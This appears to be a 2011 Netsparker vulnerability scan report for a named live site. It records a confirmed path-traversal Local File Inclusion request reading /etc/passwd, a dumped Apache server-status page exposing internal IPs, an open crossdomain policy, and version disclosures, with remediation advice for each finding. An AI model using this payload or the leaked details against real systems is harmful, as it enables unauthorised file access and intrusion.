www2.glam.com, SQL Injection, LFI REPORT SUMMARY
Loading
Netsparker - Scan Report Summary
TARGET URL
http://www2.glam.com/app/site/affiliate/viewC...
SCAN DATE
4/20/2011 8:25:39 PM
REPORT DATE
4/20/2011 8:43:57 PM
SCAN DURATION
00:00:35
Total Requests
Average Speed
req/sec.
8
identified
3
confirmed
0
critical
2
informational
GHDB, DORK Tests
GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled
VULNERABILITIES
Vulnerabilities
GHDB, DORK VULNERABILITIES
GHDB, DORK VULNERABILITIES
Local File Inclusion
Local File Inclusion
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page. Netsparker
confirmed this issue by reading some files from the target web server.
Impact
Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:
Gather usernames via /etc/password file
Harvest useful information from the log files such as "/apache/logs/error.log" or "/apache/logs/access.log"
Remotely execute commands via combining this vulnerability with some of other attack vectors such as file upload vulnerability or log injection.
If possible, do not accept appending file paths directly. Make it hard-coded or selectable from a limited hard-coded path list via an index variable
If you definitely need dynamic path concatenation, ensure that you only accept required characters such as "a-Z0-9" and do not allow "..", "/", "%00" (null byte) or any other similar unexpected characters.
Finally it is important to limit the API to allow inclusion only from a directory and directories below it. This way you can ensure that any potential attack can not perform a directory traversal attack.
- /app/site/affiliate/viewChannelModule.act
Parameters
Parameter
Type
Value
mName
GET
../../../../../../../../../../../etc/passwd
affiliateId
GET
0
adSize
GET
300x85
Request
GET /app/site/affiliate/viewChannelModule.act?mName=../../../../../../../../../../../etc/passwd%00&affiliateId=0&adSize=300x85 HTTP/1.1
Response
HTTP/1.1 200 OK
Apache Server-Status Found
Apache Server-Status Found
Netsparker found that
Apache server-status was enabled. Information disclosed from this page can be used for gaining additional information about the target system.
Impact
An attacker can gather some reconnaissance information about the internals of the target web server, such as:
Server uptime
Individual request-response statistics and CPU usage of the working processes
Current HTTP requests, client IP addresses, requested paths, processed virtual hosts
This type of information can help the attacker to gain a greater understanding of the system in use and the other potential avenues of attack available to explorer.
It is recommended that this functionality is disabled. Additionally it is recommended to comment out the <Location /server-status> section from Apache configuration file httpd.conf.
Request
GET /server-status HTTP/1.1
Response
HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Date: Thu, 21 Apr 2011 01:24:48 GMT
Content-Length: 4839
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html><head><title>Apache Status</title></head><body><h1>Apache Server Status for www2.glam.com</h1><dl><dt>Server Version: Apache/2.2.3 (CentOS)</dt><dt>Server Built: Mar 27 2010 13:52:09</dt></dl><hr /><dl><dt>Current Time: Wednesday, 20-Apr-2011 18:24:47 PDT</dt><dt>Restart Time: Sunday, 17-Apr-2011 04:02:04 PDT</dt><dt>Parent Server Generation: 1</dt><dt>Server uptime: 3 days 14 hours 22 minutes 43 seconds</dt><dt>Total accesses: 11631019 - Total Traffic: 185.0 GB</dt><dt>CPU Usage: u3035.58 s86.65 cu0 cs0 - 1% CPU load</dt><dt>37.4 requests/sec - 0.6 MB/second - 16.7 kB/request</dt><dt>11 requests currently being processed, 5 idle workers</dt></dl><pre>__WCW__CCCCC_C..WC..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................</pre><p>Scoreboard Key:<br />"<b><code>_</code></b>" Waiting for Connection, "<b><code>S</code></b>" Starting up, "<b><code>R</code></b>" Reading Request,<br />"<b><code>W</code></b>" Sending Reply, "<b><code>K</code></b>" Keepalive (read), "<b><code>D</code></b>" DNS Lookup,<br />"<b><code>C</code></b>" Closing connection, "<b><code>L</code></b>" Logging, "<b><code>G</code></b>" Gracefully finishing,<br /> "<b><code>I</code></b>" Idle cleanup of worker, "<b><code>.</code></b>" Open slot with no current process</p><p /><table border="0"><tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU</th><th>SS</th><th>Req</th><th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>VHost</th><th>Request</th></tr><tr><td><b>0-1</b></td><td>14677</td><td>0/756/613232</td><td>_</td><td>32.50</td><td>0</td><td>27</td><td>0.0</td><td>13.02</td><td>9933.04</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/log.act?;=;gaevt=imps;reqsq=5;reqid=53dd9b75c6c21a4b9b</td></tr><tr><td><b>1-1</b></td><td>14597</td><td>0/789/612208</td><td>_</td><td>32.20</td><td>0</td><td>25</td><td>0.0</td><td>14.20</td><td>9925.20</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^867c0769f54091508e77f5b4941</td></tr><tr><td><b>2-1</b></td><td>14679</td><td>0/728/608668</td><td><b>W</b></td><td>30.56</td><td>0</td><td>0</td><td>0.0</td><td>13.72</td><td>9876.82</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^b65e192c91dc211d55672830238</td></tr><tr><td><b>3-1</b></td><td>14887</td><td>1/600/609914</td><td><b>C</b></td><td>26.28</td><td>0</td><td>6</td><td>0.1</td><td>10.89</td><td>9882.27</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_regions.act?output=js&dma=508 HTTP/1.1</td></tr><tr><td><b>4-1</b></td><td>14889</td><td>0/606/611944</td><td><b>W</b></td><td>22.84</td><td>0</td><td>0</td><td>0.0</td><td>10.59</td><td>9921.24</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /server-status HTTP/1.1</td></tr><tr><td><b>5-1</b></td><td>14894</td><td>0/594/608636</td><td>_</td><td>23.60</td><td>0</td><td>3</td><td>0.0</td><td>10.56</td><td>9840.07</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/urldata.act?srcid=2&afid=318973508&url=8npiku&ord=2171</td></tr><tr><td><b>6-1</b></td><td>15387</td><td>0/497/609751</td><td>_</td><td>21.03</td><td>0</td><td>109</td><td>0.0</td><td>7.91</td><td>9889.17</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^c02c7cbd7e9ed8e671c1c575fea</td></tr><tr><td><b>7-1</b></td><td>15394</td><td>1/424/608058</td><td><b>C</b></td><td>19.21</td><td>0</td><td>27</td><td>0.1</td><td>6.87</td><td>9849.94</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/log.act?;=;gaevt=imps;reqsq=5;reqid=57fc88c7971345e6ef</td></tr><tr><td><b>8-1</b></td><td>15633</td><td>1/334/605873</td><td><b>C</b></td><td>15.33</td><td>0</td><td>3</td><td>37.8</td><td>5.59</td><td>9870.47</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>9-1</b></td><td>15828</td><td>1/225/604614</td><td><b>C</b></td><td>8.69</td><td>0</td><td>4</td><td>39.8</td><td>4.46</td><td>9797.63</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>10-1</b></td><td>16015</td><td>1/154/603779</td><td><b>C</b></td><td>8.52</td><td>0</td><td>4</td><td>160.2</td><td>2.77</td><td>9801.69</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>11-1</b></td><td>16075</td><td>1/92/595256</td><td><b>C</b></td><td>4.51</td><td>0</td><td>3</td><td>37.6</td><td>1.30</td><td>9684.80</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>12-1</b></td><td>16189</td><td>0/69/598801</td><td>_</td><td>2.31</td><td>0</td><td>3</td><td>0.0</td><td>1.13</td><td>9708.68</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>13-1</b></td><td>15093</td><td>1/584/588102</td><td><b>C</b></td><td>25.42</td><td>0</td><td>3</td><td>37.2</td><td>9.57</td><td>9531.16</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>14-1</b></td><td>-</td><td>0/0/577395</td><td>.</td><td>80.35</td><td>262</td><td>3</td><td>0.0</td><td>0.00</td><td>9387.57</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>15-1</b></td><td>-</td><td>0/0/564068</td><td>.</td><td>79.33</td><td>57</td><td>24</td><td>0.0</td><td>0.00</td><td>9192.01</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^3b1b6e8fcbf82abaaf4af06ac52</td></tr><tr><td><b>16-1</b></td><td>12420</td><td>0/1835/507818</td><td><b>W</b></td><td>75.33</td><td>0</td><td>0</td><td>0.0</td><td>32.41</td><td>8301.56</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^e938f9de45416483d819cc74e46</td></tr><tr><td><b>17-1</b></td><td>14121</td><td>1/1111/437460</td><td><b>C</b></td><td>44.36</td><td>0</td><td>4</td><td>104.2</td><td>19.47</td><td>7204.23</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>18-1</b></td><td>-</td><td>0/0/325101</td><td>.</td><td>77.94</td><td>9841</td><td>107</td><td>0.0</td><td>0.00</td><td>5407.54</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^366a401b00bdff1f35eddce3786</td></tr><tr><td><b>19-1</b></td><td>-</td><td>0/0/245555</td><td>.</td><td>80.46</td><td>12423</td><td>6</td><td>0.0</td><td>0.00</td><td>4141.23</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_regions.act?output=js&dma=506 HTTP/1.1</td></tr><tr><td><b>20-1</b></td><td>-</td><td>0/0/198964</td><td>.</td><td>81.34</td><td>14126</td><td>105</td><td>0.0</td><td>0.00</td><td>3350.29</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^7b22addebc07ccd22c4e88beec3</td></tr><tr><td><b>21-1</b></td><td>-</td><td>0/0/141213</td><td>.</td><td>79.29</td><td>16691</td><td>3</td><td>0.0</td><td>0.00</td><td>2394.49</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>22-1</b></td><td>-</td><td>0/0/77655</td><td>.</td><td>81.09</td><td>19276</td><td>23</td><td>0.0</td><td>0.00</td><td>1285.08</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^26d822a1db98bf1cc88a2a4ef26</td></tr><tr><td><b>23-1</b></td><td>-</td><td>0/0/26534</td><td>.</td><td>81.87</td><td>26505</td><td>2</td><td>0.0</td><td>0.00</td><td>427.84</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=getAdJs&aff</td></tr><tr><td><b>24-1</b></td><td>-</td><td>0/0/7646</td><td>.</td><td>111.56</td><td>193529</td><td>3</td><td>0.0</td><td>0.00</td><td>119.25</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>25-1</b></td><td>-</td><td>0/0/3842</td><td>.</td><td>98.40</td><td>193170</td><td>3</td><td>0.0</td><td>0.00</td><td>61.05</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=getAdJs&aff</td></tr><tr><td><b>26-1</b></td><td>-</td><td>0/0/10</td><td>.</td><td>0.24</td><td>310921</td><td>0</td><td>0.0</td><td>0.00</td><td>0.13</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>27-1</b></td><td>-</td><td>0/0/19</td><td>.</td><td>0.76</td><td>310889</td><td>0</td><td>0.0</td><td>0.00</td><td>0.28</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>28-1</b></td><td>-</td><td>0/0/25</td><td>.</td><td>0.79</td><td>310871</td><td>0</td><td>0.0</td><td>0.00</td><td>0.44</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>29-1</b></td><td>-</td><td>0/0/16</td><td>.</td><td>0.72</td><td>310895</td><td>0</td><td>0.0</td><td>0.00</td><td>0.34</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>30-1</b></td><td>-</td><td>0/0/8</td><td>.</td><td>0.63</td><td>310919</td><td>0</td><td>0.0</td><td>0.00</td><td>0.04</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>31-1</b></td><td>-</td><td>0/0/5</td><td>.</td><td>0.32</td><td>310942</td><td>0</td><td>0.0</td><td>0.00</td><td>0.04</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>32-1</b></td><td>-</td><td>0/0/1725</td><td>.</td><td>85.57</td><td>308786</td><td>154</td><td>0.0</td><td>0.00</td><td>26.97</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^e74b92579e6ad51a52cb26eee4b</td></tr><tr><td><b>33-1</b></td><td>-</td><td>0/0/1</td><td>.</td><td>0.00</td><td>310961</td><td>0</td><td>0.0</td><td>0.00</td><td>0.00</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>34-1</b></td><td>-</td><td>0/0/23</td><td>.</td><td>1.19</td><td>310882</td><td>0</td><td>0.0</td><td>0.00</td><td>0.38</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>35-1</b></td><td>-</td><td>0/0/1721</td><td>.</td><td>82.51</td><td>308776</td><td>4</td><td>0.0</td><td>0.00</td><td>27.91</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>36-1</b></td><td>-</td><td>0/0/3</td><td>.</td><td>0.01</td><td>310947</td><td>0</td><td>0.0</td><td>0.00</td><td>0.05</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>37-1</b></td><td>-</td><td>0/0/10</td><td>.</td><td>0.41</td><td>310917</td><td>0</td><td>0.0</td><td>0.00</td><td>0.22</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>38-1</b></td><td>-</td><td>0/0/30</td><td>.</td><td>1...
Open Policy Crossdomain.xml Identified
Open Policy Crossdomain.xml Identified
Netsparker identified Open Policy Crossdomain.xml file.
Impact
Open Policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.
Configure your Crossdomain.xml to prevent access from everywhere to your domain.
External References
<allow-access-from domain="*" />
Request
GET /crossdomain.xml HTTP/1.1
Response
HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 16 Sep 2010 21:08:11 GMT
ETag: "6b8007-cc-49066d7f404c0"
Accept-Ranges: bytes
Content-Length: 204
Content-Type: text/xml
Date: Thu, 21 Apr 2011 01:24:49 GMT
Connection: keep-alive
X-N: S
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-policy>
Apache Version Disclosure
Apache Version Disclosure
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.
Impact
An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.
Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /app/site/affiliate/viewChannelModule.act
2.2.3 (CentOS)
Request
GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwdviewAdJs&affiliateId=0&adSize=300x85 HTTP/1.1
Response
HTTP/1.1 200 OK
PHP Version Disclosure
PHP Version Disclosure
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.
Impact
An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /app/site/affiliate/viewChannelModule.act
PHP/5.1.6
Request
GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwdviewAdJs&affiliateId=0&adSize=300x85 HTTP/1.1
Response
HTTP/1.1 200 OK
[Possible] Internal IP Address Leakage
[Possible] Internal IP Address Leakage
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.
Impact
This kind of information can be useful for an attacker when combined with other vulnerabilities.
First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.
10.0.3.7 10.0.4.167 10.0.4.6
Request
GET /server-status HTTP/1.1
Response
HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Date: Thu, 21 Apr 2011 01:24:48 GMT
Content-Length: 4839
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html><head><title>Apache Status</title></head><body><h1>Apache Server Status for www2.glam.com</h1><dl><dt>Server Version: Apache/2.2.3 (CentOS)</dt><dt>Server Built: Mar 27 2010 13:52:09</dt></dl><hr /><dl><dt>Current Time: Wednesday, 20-Apr-2011 18:24:47 PDT</dt><dt>Restart Time: Sunday, 17-Apr-2011 04:02:04 PDT</dt><dt>Parent Server Generation: 1</dt><dt>Server uptime: 3 days 14 hours 22 minutes 43 seconds</dt><dt>Total accesses: 11631019 - Total Traffic: 185.0 GB</dt><dt>CPU Usage: u3035.58 s86.65 cu0 cs0 - 1% CPU load</dt><dt>37.4 requests/sec - 0.6 MB/second - 16.7 kB/request</dt><dt>11 requests currently being processed, 5 idle workers</dt></dl><pre>__WCW__CCCCC_C..WC..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................</pre><p>Scoreboard Key:<br />"<b><code>_</code></b>" Waiting for Connection, "<b><code>S</code></b>" Starting up, "<b><code>R</code></b>" Reading Request,<br />"<b><code>W</code></b>" Sending Reply, "<b><code>K</code></b>" Keepalive (read), "<b><code>D</code></b>" DNS Lookup,<br />"<b><code>C</code></b>" Closing connection, "<b><code>L</code></b>" Logging, "<b><code>G</code></b>" Gracefully finishing,<br /> "<b><code>I</code></b>" Idle cleanup of worker, "<b><code>.</code></b>" Open slot with no current process</p><p /><table border="0"><tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU</th><th>SS</th><th>Req</th><th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>VHost</th><th>Request</th></tr><tr><td><b>0-1</b></td><td>14677</td><td>0/756/613232</td><td>_</td><td>32.50</td><td>0</td><td>27</td><td>0.0</td><td>13.02</td><td>9933.04</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/log.act?;=;gaevt=imps;reqsq=5;reqid=53dd9b75c6c21a4b9b</td></tr><tr><td><b>1-1</b></td><td>14597</td><td>0/789/612208</td><td>_</td><td>32.20</td><td>0</td><td>25</td><td>0.0</td><td>14.20</td><td>9925.20</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^867c0769f54091508e77f5b4941</td></tr><tr><td><b>2-1</b></td><td>14679</td><td>0/728/608668</td><td><b>W</b></td><td>30.56</td><td>0</td><td>0</td><td>0.0</td><td>13.72</td><td>9876.82</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^b65e192c91dc211d55672830238</td></tr><tr><td><b>3-1</b></td><td>14887</td><td>1/600/609914</td><td><b>C</b></td><td>26.28</td><td>0</td><td>6</td><td>0.1</td><td>10.89</td><td>9882.27</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_regions.act?output=js&dma=508 HTTP/1.1</td></tr><tr><td><b>4-1</b></td><td>14889</td><td>0/606/611944</td><td><b>W</b></td><td>22.84</td><td>0</td><td>0</td><td>0.0</td><td>10.59</td><td>9921.24</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /server-status HTTP/1.1</td></tr><tr><td><b>5-1</b></td><td>14894</td><td>0/594/608636</td><td>_</td><td>23.60</td><td>0</td><td>3</td><td>0.0</td><td>10.56</td><td>9840.07</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/urldata.act?srcid=2&afid=318973508&url=8npiku&ord=2171</td></tr><tr><td><b>6-1</b></td><td>15387</td><td>0/497/609751</td><td>_</td><td>21.03</td><td>0</td><td>109</td><td>0.0</td><td>7.91</td><td>9889.17</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^c02c7cbd7e9ed8e671c1c575fea</td></tr><tr><td><b>7-1</b></td><td>15394</td><td>1/424/608058</td><td><b>C</b></td><td>19.21</td><td>0</td><td>27</td><td>0.1</td><td>6.87</td><td>9849.94</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/log.act?;=;gaevt=imps;reqsq=5;reqid=57fc88c7971345e6ef</td></tr><tr><td><b>8-1</b></td><td>15633</td><td>1/334/605873</td><td><b>C</b></td><td>15.33</td><td>0</td><td>3</td><td>37.8</td><td>5.59</td><td>9870.47</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>9-1</b></td><td>15828</td><td>1/225/604614</td><td><b>C</b></td><td>8.69</td><td>0</td><td>4</td><td>39.8</td><td>4.46</td><td>9797.63</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>10-1</b></td><td>16015</td><td>1/154/603779</td><td><b>C</b></td><td>8.52</td><td>0</td><td>4</td><td>160.2</td><td>2.77</td><td>9801.69</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>11-1</b></td><td>16075</td><td>1/92/595256</td><td><b>C</b></td><td>4.51</td><td>0</td><td>3</td><td>37.6</td><td>1.30</td><td>9684.80</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>12-1</b></td><td>16189</td><td>0/69/598801</td><td>_</td><td>2.31</td><td>0</td><td>3</td><td>0.0</td><td>1.13</td><td>9708.68</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>13-1</b></td><td>15093</td><td>1/584/588102</td><td><b>C</b></td><td>25.42</td><td>0</td><td>3</td><td>37.2</td><td>9.57</td><td>9531.16</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>14-1</b></td><td>-</td><td>0/0/577395</td><td>.</td><td>80.35</td><td>262</td><td>3</td><td>0.0</td><td>0.00</td><td>9387.57</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>15-1</b></td><td>-</td><td>0/0/564068</td><td>.</td><td>79.33</td><td>57</td><td>24</td><td>0.0</td><td>0.00</td><td>9192.01</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^3b1b6e8fcbf82abaaf4af06ac52</td></tr><tr><td><b>16-1</b></td><td>12420</td><td>0/1835/507818</td><td><b>W</b></td><td>75.33</td><td>0</td><td>0</td><td>0.0</td><td>32.41</td><td>8301.56</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^e938f9de45416483d819cc74e46</td></tr><tr><td><b>17-1</b></td><td>14121</td><td>1/1111/437460</td><td><b>C</b></td><td>44.36</td><td>0</td><td>4</td><td>104.2</td><td>19.47</td><td>7204.23</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>18-1</b></td><td>-</td><td>0/0/325101</td><td>.</td><td>77.94</td><td>9841</td><td>107</td><td>0.0</td><td>0.00</td><td>5407.54</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^366a401b00bdff1f35eddce3786</td></tr><tr><td><b>19-1</b></td><td>-</td><td>0/0/245555</td><td>.</td><td>80.46</td><td>12423</td><td>6</td><td>0.0</td><td>0.00</td><td>4141.23</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_regions.act?output=js&dma=506 HTTP/1.1</td></tr><tr><td><b>20-1</b></td><td>-</td><td>0/0/198964</td><td>.</td><td>81.34</td><td>14126</td><td>105</td><td>0.0</td><td>0.00</td><td>3350.29</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^7b22addebc07ccd22c4e88beec3</td></tr><tr><td><b>21-1</b></td><td>-</td><td>0/0/141213</td><td>.</td><td>79.29</td><td>16691</td><td>3</td><td>0.0</td><td>0.00</td><td>2394.49</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>22-1</b></td><td>-</td><td>0/0/77655</td><td>.</td><td>81.09</td><td>19276</td><td>23</td><td>0.0</td><td>0.00</td><td>1285.08</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^26d822a1db98bf1cc88a2a4ef26</td></tr><tr><td><b>23-1</b></td><td>-</td><td>0/0/26534</td><td>.</td><td>81.87</td><td>26505</td><td>2</td><td>0.0</td><td>0.00</td><td>427.84</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=getAdJs&aff</td></tr><tr><td><b>24-1</b></td><td>-</td><td>0/0/7646</td><td>.</td><td>111.56</td><td>193529</td><td>3</td><td>0.0</td><td>0.00</td><td>119.25</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>25-1</b></td><td>-</td><td>0/0/3842</td><td>.</td><td>98.40</td><td>193170</td><td>3</td><td>0.0</td><td>0.00</td><td>61.05</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=getAdJs&aff</td></tr><tr><td><b>26-1</b></td><td>-</td><td>0/0/10</td><td>.</td><td>0.24</td><td>310921</td><td>0</td><td>0.0</td><td>0.00</td><td>0.13</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>27-1</b></td><td>-</td><td>0/0/19</td><td>.</td><td>0.76</td><td>310889</td><td>0</td><td>0.0</td><td>0.00</td><td>0.28</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>28-1</b></td><td>-</td><td>0/0/25</td><td>.</td><td>0.79</td><td>310871</td><td>0</td><td>0.0</td><td>0.00</td><td>0.44</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * 